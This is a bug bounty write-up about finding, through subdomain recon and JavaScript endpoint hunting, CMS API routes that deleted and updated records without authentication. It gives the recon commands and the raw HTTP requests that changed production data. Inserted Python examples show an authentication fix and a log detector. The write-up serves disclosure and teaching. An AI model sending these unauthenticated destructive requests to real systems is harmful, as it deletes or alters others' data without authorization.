Missing authentication in API endpoints leads to order updates and bulk deletion in a CMS web app, from recon.
—
- First I start with recon, using the subdomain enumeration tools from projectdiscovery.

Run subfinder with the root domain:

```shell
subfinder -d target.com -all -recursive -o subfinder.txt
```

Then run it again after collecting the wildcard subdomains from https://crt.sh/:

```shell
subfinder -dL subdomains_from_crt.txt -all -recursive -o 2subfinder.txt
```

- And with other tools, and with these commands, to get more results:
```shell
curl -s -H "APIKEY: <YOUR API KEY>" -H "Accept: application/json" \
"https://api.securitytrails.com/v1/domain/target.com/subdomains?limit=50000" \
| jq -r '.subdomains // [] | .[] | "\(.).target.com"' \
| sort -u \
| tee securitytrails.txt
```

```shell
curl -s "https://crt.sh/?q=%25.target.com&output=json" \
| jq -r '.[]?.name_value' \
| sed 's/\*\.//g' \
| sort -u \
| tee crtsh_subs.txt
```

```shell
# strip the scheme (http or https) and everything after the host
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" \
| sort \
| sed -E 's|https?://([^/]+).*|\1|' \
| sort -u \
| tee wayback.txt
```
```shell
curl -s 'https://subdomainfinder.c99.nl/scans/2025-12-29/<target.com>' \
| grep -Eo '([A-Za-z0-9_-]+\.)+target\.com' \
| sort -u \
| tee c99.txt
```

NOTE: you need to go to https://subdomainfinder.c99.nl/, run a fresh scan, then take the link and put it in the command so it works without any error and returns fresh results. Do the same step to get the IPs for the subdomains with this command:

```shell
curl -s 'https://subdomainfinder.c99.nl/scans/2025-12-29/target.com' \
| grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' \
| sort -u \
| tee c99_ips.txt
```

- Those are all the useful commands you can use; of course, with Google and GitHub dorking with brand-related keywords you will get more useful results. Other resources:
https://api.subdomain.center/?domain=target.com
https://api.hackertarget.com/hostsearch/?q=target.com
https://anubisdb.com/anubis/subdomains/target.com
https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names
https://urlscan.io/api/v1/search/?q=domain:target.com
virustotal.com/vtapi/v2/domain/report?apikey=<YOUR API KEY>&domain=target.com
https://app.netlas.io/domains/

- After I collect the subdomains and sort them, I love to collect and start with JS files, but this time I used this command to filter them with httpx instead of starting with JS:
```shell
httpx -list allsubs.txt -status-code -content-length -content-type -line-count -title -body-preview -server -tech-detect -probe-all-ips -include-response -follow-host-redirects -random-agent -o httpx.txt
```

- Taking a look at the results and opening them one by one, I found a subdomain returning 200 called:

expert-cms-something.something-something.target.com

- It looked interesting. I opened this subdomain, and I opened the dev tools in my browser too; if you don't know how to deal with dev tools, watch this video: https://youtu.be/Y1S5s3FmFsI?si=6fP5L352YGf9jNy1
- And I usually use the dev tools to search the JS files with keywords, like:

```
method:
http.post
http.get
http.put
path:"
href:"
ref.indexOf('/
.post("
.get("
```

and so on (I will write about my method for JS hunting),
until I found a lot of API paths with different HTTP methods. Going back to my Repeater to make the HTTP request, I started with this path called `/api/DeleteItems/` with the POST method, and made this HTTP request:

```http
POST /api/DeleteItems/ HTTP/2
Host: expert-cms-something.something-something.target.com
Content-Type: application/json

{}
```

- By tracking the error messages in the responses, the final HTTP request ended up like this:

```http
POST /api/DeleteItems/ HTTP/2
Host: expert-cms-something.something-something.target.com
Content-Type: application/json

{
"order": "232",
"Ids": [101003]
}
```

- I got this response:

```json
{"success":true,"message":null,"items":null}
```

Wow, what's happening here?? 200 OK, where is the authentication here? The HTTP request is really used to delete items, and without authentication!!!
Going back to the other API endpoints I found:

- With the same method as the previous HTTP request, tracking the error messages in the responses again, but this time with the PUT request method on `/api/updateorder/`, the second request ended up like this:

```http
PUT /api/updateorder/101003 HTTP/2
Host: expert-cms-something.something-something.target.com
```

- I got the same response:

```json
{"success":true,"message":null,"items":null}
```

- At this moment I didn't understand what I was really doing, but I had another API path I found in the same JS file, called `/api/delete/` with the DELETE method. I created an HTTP request and put a random number after the path, like this:

```http
DELETE /api/delete/101013 HTTP/2
Host: expert-cms-something.something-something.target.com
```

- Response:

```json
{"success":true,"message":null,"items":null}
```

- I sent this request twice!!! so I could see whether it was a false positive or I was really able to delete it. Sending this request again returned this response:

```json
{"success": false, "message": "Object reference not set to an instance of an object.", "items": null}
```
1- Bulk deletion using the POST request
This endpoint allows an attacker to delete multiple CMS records in a single request.
2- Updating orders
This allows arbitrary modification of CMS data without authentication.
3- Single deletion
This endpoint allows permanent deletion of individual CMS records by ID.

Why did this happen?
- Missing authentication middleware on CMS API routes
- No authorization checks validating user permissions
- Internal CMS endpoints exposed to the public internet
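The three causes above, as an added example that is not the target's code and not from the report: a small framework-free Python model of the same three routes (`/api/DeleteItems/`, `/api/updateorder/<id>`, `/api/delete/<id>`), first a handler with no authentication at all (the behaviour seen in the write-up), then the same routes behind a `require_auth` middleware and a per-object `authorize` check. The token table, the tenant ownership model, the `Request`/`Response` shapes and the item store are all constructed assumptions; a real service would validate signed tokens against its identity provider rather than a dictionary.

```python
import re
from dataclasses import dataclass, field
from typing import Any, Optional


@dataclass
class Request:           # assumed minimal request shape
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    json: Any = None


@dataclass
class Response:
    status: int
    body: dict


def fresh_items() -> dict:
    """Constructed CMS records: id -> owning tenant and display order (assumed shape)."""
    return {101003: {"owner": "tenant-a", "order": 1},
            101013: {"owner": "tenant-b", "order": 2}}


# Constructed bearer tokens -> principal. A real service validates a signed token instead.
TOKENS = {"tok-writer": {"tenant": "tenant-a", "perms": {"cms:write"}},
          "tok-reader": {"tenant": "tenant-a", "perms": set()}}


# --- Before: the behaviour the write-up observed. Nobody asks who is calling. ---
def vulnerable_delete_items(req: Request, items: dict) -> Response:
    for item_id in (req.json or {}).get("Ids", []):
        items.pop(item_id, None)
    return Response(200, {"success": True, "message": None, "items": None})


# --- After: authentication middleware plus per-object authorization. ---
def authenticate(req: Request) -> Optional[dict]:
    """Resolve the bearer token to a principal, or None when absent or unknown."""
    scheme, _, token = req.headers.get("Authorization", "").partition(" ")
    return TOKENS.get(token) if scheme == "Bearer" else None


def require_auth(handler):
    """Middleware for every CMS route: without a valid principal the handler never runs."""
    def wrapped(req: Request, items: dict) -> Response:
        principal = authenticate(req)
        if principal is None:
            return Response(401, {"success": False, "message": "authentication required"})
        return handler(req, items, principal)
    return wrapped


def authorize(principal: dict, items: dict, item_id: int) -> int:
    """404 if the record is missing, 403 if it belongs to another tenant or the caller
    lacks cms:write, otherwise 200. A missing record is a plain 404, not a leaked
    exception message like the one the second DELETE in the write-up produced."""
    item = items.get(item_id)
    if item is None:
        return 404
    if item["owner"] != principal["tenant"] or "cms:write" not in principal["perms"]:
        return 403
    return 200


def deny(status: int) -> Response:
    return Response(status, {"success": False, "message": {403: "forbidden", 404: "not found"}[status]})


def path_id(req: Request, prefix: str) -> Optional[int]:
    """Extract the numeric id after prefix; anything else is rejected by the caller."""
    m = re.fullmatch(re.escape(prefix) + r"(\d+)", req.path)
    return int(m.group(1)) if m else None


def is_id(value: Any) -> bool:
    return isinstance(value, int) and not isinstance(value, bool)


@require_auth
def delete_items(req: Request, items: dict, principal: dict) -> Response:  # POST /api/DeleteItems/
    ids = (req.json or {}).get("Ids")
    if not isinstance(ids, list) or not all(is_id(i) for i in ids):
        return Response(400, {"success": False, "message": "Ids must be a list of integers"})
    # All-or-nothing: authorize every id before touching any, so a bulk request cannot half-succeed.
    for item_id in ids:
        status = authorize(principal, items, item_id)
        if status != 200:
            return deny(status)
    for item_id in ids:
        del items[item_id]
    return Response(200, {"success": True, "deleted": len(ids)})


@require_auth
def update_order(req: Request, items: dict, principal: dict) -> Response:  # PUT /api/updateorder/<id>
    item_id = path_id(req, "/api/updateorder/")
    order = (req.json or {}).get("order")
    if item_id is None or not is_id(order):
        return Response(400, {"success": False, "message": "bad id or order"})
    status = authorize(principal, items, item_id)
    if status != 200:
        return deny(status)
    items[item_id]["order"] = order
    return Response(200, {"success": True})


@require_auth
def delete_item(req: Request, items: dict, principal: dict) -> Response:  # DELETE /api/delete/<id>
    item_id = path_id(req, "/api/delete/")
    if item_id is None:
        return Response(400, {"success": False, "message": "bad id"})
    status = authorize(principal, items, item_id)
    if status != 200:
        return deny(status)
    del items[item_id]
    return Response(200, {"success": True})
```

Two design points worth copying: the bulk route authorizes every id before deleting any, so a request mixing the caller's own records with someone else's fails as a whole rather than partially succeeding, and a repeat delete of an already-removed record is a plain 404, which removes the "Object reference not set" style message that told the tester the first delete had really gone through.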
Impact
An unauthenticated attacker can:
- Modify CMS records
- Delete individual records
- Perform bulk deletion of multiple records
Real-World Risk
- Permanent loss of critical CMS data
- Disruption of core business workflows
- Integrity and availability compromise
- Financial and reputational damage
This represents a Critical severity issue due to unauthenticated access to destructive production functionality.
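On the detection side, as an added example that is not from the report or the program: if a reverse proxy or API gateway logs each request as one JSON object with the fields assumed below (`method`, `path`, `status`, `src`, `auth` for whether any credential was present, and `body_ids` for the number of ids counted in a bulk body), this Python routine flags successful mutating calls on `/api/` routes that carried no credential, which is exactly the condition behind all three findings above, and separately flags oversized bulk deletes. Numeric path ids are collapsed so `/api/delete/101013` and `/api/delete/7` count as one route per source. The log lines are constructed.

```python
import json
import re
from collections import Counter, defaultdict

MUTATING = {"POST", "PUT", "PATCH", "DELETE"}

# Constructed gateway log, one JSON object per line. Field names are assumptions:
# auth = whether an Authorization header or session cookie was present,
# body_ids = number of ids the gateway counted in a bulk body (0 when not applicable).
SAMPLE_LOG = """
{"ts":"2025-12-29T10:00:01Z","src":"203.0.113.7","method":"POST","path":"/api/DeleteItems/","status":200,"auth":false,"body_ids":1}
{"ts":"2025-12-29T10:00:05Z","src":"203.0.113.7","method":"PUT","path":"/api/updateorder/101003","status":200,"auth":false,"body_ids":0}
{"ts":"2025-12-29T10:00:09Z","src":"203.0.113.7","method":"DELETE","path":"/api/delete/101013","status":200,"auth":false,"body_ids":0}
{"ts":"2025-12-29T10:00:12Z","src":"203.0.113.7","method":"DELETE","path":"/api/delete/101013","status":200,"auth":false,"body_ids":0}
{"ts":"2025-12-29T10:01:00Z","src":"198.51.100.4","method":"POST","path":"/api/DeleteItems/","status":200,"auth":true,"body_ids":25}
{"ts":"2025-12-29T10:01:30Z","src":"198.51.100.9","method":"GET","path":"/api/items","status":200,"auth":false,"body_ids":0}
{"ts":"2025-12-29T10:02:00Z","src":"198.51.100.4","method":"POST","path":"/api/DeleteItems/","status":401,"auth":false,"body_ids":40}
this line is not JSON and must not crash the job
"""


def normalize_route(path: str) -> str:
    """Collapse numeric path ids so /api/delete/101013 and /api/delete/7 count as one route."""
    return re.sub(r"/\d+(?=/|$)", "/<id>", path)


def analyze(log_text: str, bulk_threshold: int = 10) -> dict:
    """Return findings plus a per-source count of mutating /api/ calls by route."""
    findings = []
    per_source = defaultdict(Counter)
    for raw in log_text.strip().splitlines():
        try:
            e = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip it, keep processing the rest
        if e["method"] not in MUTATING or not e["path"].startswith("/api/"):
            continue
        route = f'{e["method"]} {normalize_route(e["path"])}'
        per_source[e["src"]][route] += 1
        succeeded = 200 <= e["status"] < 300
        if succeeded and not e["auth"]:
            # A state-changing API call that succeeded with no credential at all.
            findings.append({"rule": "unauthenticated_mutation", "src": e["src"],
                             "route": route, "ts": e["ts"]})
        if succeeded and e["path"] == "/api/DeleteItems/" and e.get("body_ids", 0) > bulk_threshold:
            # Even an authenticated bulk delete above the threshold deserves a look.
            findings.append({"rule": "large_bulk_delete", "src": e["src"],
                             "count": e["body_ids"], "ts": e["ts"]})
    return {"findings": findings,
            "per_source": {src: dict(c) for src, c in per_source.items()}}


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG)["findings"]:
        print(finding)
```

The first rule is the one to alert on: once the routes are behind authentication middleware, a successful mutating call with `auth` false should never appear again, so any hit is either a regression (a new route added without the middleware) or a bypass worth investigating.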
—
After reporting it, I started fuzzing every place in this subdomain and found a "dev" subdomain with the same API endpoints and the same results. I didn't report it in another submission for this reason: it would be closed as a duplicate.

- After one week, the team accepted it, but only as a P2, with the maximum bounty for P2.

alhamdulillah.
That's all for today; wait for the next one. You can follow me on X.
Thank you, and I hope you learned something that helps you.